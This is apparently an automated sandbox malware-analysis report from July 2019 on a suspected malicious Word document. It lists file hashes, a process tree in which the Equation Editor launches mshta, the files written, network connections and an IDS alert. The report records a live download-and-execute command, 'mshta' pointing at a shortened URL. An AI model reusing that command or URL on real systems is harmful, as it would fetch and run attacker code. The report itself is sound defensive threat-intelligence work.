File name: | 1983d430e2516f920dfde5930c9e9b543a398eb4 |
Full analysis: | https://app.any.run/tasks/9018fa8e-44b0-429e-b048-dca095cfe642 |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 13:42:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | 05C48379DB1736DB0615722B0EB01E40 |
SHA1: | 1983D430E2516F920DFDE5930C9E9B543A398EB4 |
SHA256: | D6D5AF7020B8496695D2CB5CB169E4B1CABD7D8477BD7C01DA0E33D06791D1D0 |
SSDEEP: | 1536:EU0UwUrUrU0U0UrUrUrUrUrUrUrUwU6U/UMUqUvU45M85M65M85Mk5M85Mo5M85A:0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3272 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\1983d430e2516f920dfde5930c9e9b543a398eb4 | C:\Windows\system32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3772 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\1983d430e2516f920dfde5930c9e9b543a398eb4" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | |||||||||||||||
3164 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | ||||||||||||
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | |||||||||||||||
2124 | mshta http://bit.ly/2ShPIfD &AAAAAAAAAAAAAAAC | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3772 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7F37.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2124 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | text | |
MD5:60A5F802CBA46E892924B5D4BB72B3E5 | SHA256:90E3DD5E0474685B8486DD44A9E0D1A5917682DF71CAC9857A5B7FA0B3A9A175 | |||
3772 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:34EACA8F19D3F125933967BF799C1B2A | SHA256:92B4310C33D6E68CC30E68791674135C523BC80A04AF7689036BB5F634837927 | |||
3772 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\1983d430e2516f920dfde5930c9e9b543a398eb4.LNK | lnk | |
MD5:BA9E818154030669D8ADAD4F1909D7B3 | SHA256:4DF4F180D5083266ED888E22B1FC7049396ADC001806E963FB0A9D416360A15D | |||
3772 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:7659383B7AF1183D29F7B26E432F39DC | SHA256:3A1C6B90D4A229E9BD5FA323B3A2130F6D8E21652C526EE349FBEB79653F0F09 | |||
3772 | WINWORD.EXE | C:\Users\admin\Desktop\~$83d430e2516f920dfde5930c9e9b543a398eb4 | pgc | |
MD5:034B21BA28D7762ED358118B671B0726 | SHA256:6CA8BEE30D81772F14FB6182D2BA39B18DC445BF1DBECFA1D6DB1E1C93C70A84 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2124 | mshta.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2ShPIfD | US | html | 123 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2124 | mshta.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2124 | mshta.exe | 35.225.200.121:80 | — | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2124 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |